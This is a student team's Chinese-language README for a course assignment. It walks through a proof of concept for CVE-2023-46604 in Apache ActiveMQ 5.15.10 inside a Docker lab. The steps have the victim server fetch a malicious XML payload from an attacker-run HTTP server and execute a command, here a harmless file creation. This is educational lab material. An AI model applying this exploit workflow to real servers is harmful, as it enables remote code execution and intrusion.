作业: SSP 作业 3 团队: RCE You Later 成员: Banica Horia Alexandru, Comarlau Vlad-Constantin
使用此仓库进行 PoC 的视频链接: https://www.youtube.com/watch?v=vum4qTF4ygU
此仓库包含针对 CVE-2023-46604 的完整功能概念验证 (PoC)。 该漏洞允许攻击者通过强制易受攻击的 Apache ActiveMQ 服务器(版本 5.15.10)反序列化恶意 XML 配置文件,从而在其上执行任意 shell 命令。
目标: 在受害服务器内创建一个名为 pwned_by_ssp_team 的文件,以证明我们拥有控制权。
在运行利用之前,请确保您具备:
vulnerable-env/:包含受害服务器的 Docker 配置。attacker/:包含利用脚本和恶意负载。
exploit.py:发送恶意数据包的 Python 脚本。serve.py:用于托管 XML 负载的简单 HTTP 服务器。poc.xml:包含命令 touch /tmp/pwned_by_ssp_team 的恶意配置文件。我们将使用 Docker 运行一个旧的、易受攻击的 ActiveMQ 版本。
vulnerable-env 文件夹:
cd vulnerable-env
docker-compose up -d
受害服务器需要从我们这里下载指令。我们将设置一个小型 Web 服务器来托管这些指令。
attacker 文件夹:
cd attacker
python3 serve.py
现在我们将发送触发漏洞的特定网络数据包。
打开第三个终端。
导航到 attacker 文件夹:
cd attacker
运行利用脚本。
python3 exploit.py -i 127.0.0.1 -p 61616 -u http://host.docker.internal:8000/poc.xml
host.docker.internal 替换为网络桥接的网关地址,通常为:172.17.0.1。如果指定的地址无效,请尝试通过以下方式获取地址:docker network inspect bridge -f '{{range .IPAM.Config}}{{.Gateway}}{{end}}'是否成功?让我们检查文件是否在容器内被创建。
/tmp 文件夹:
docker exec activemq-victim ls -l /tmp
pwned_by_ssp_team 的文件。要停止并移除易受攻击的容器:
cd vulnerable-env
docker-compose down